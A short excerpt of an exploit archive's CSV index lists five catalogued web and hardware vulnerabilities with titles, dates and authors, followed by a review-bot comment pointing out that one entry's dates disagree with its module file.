43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware,
43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download",2017-12-27,"Glafkos Charalambous",webapps,aspx,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,
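
Review bot: the `43405` row carries date `2017-12-27` while `43405.rb` itself says `Date: 23/01/2014` in its header and `DisclosureDate => 'Mar 23 2015'` in the module metadata; three different dates for one entry should be reconciled, at minimum by making the module's header and `DisclosureDate` agree with each other.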
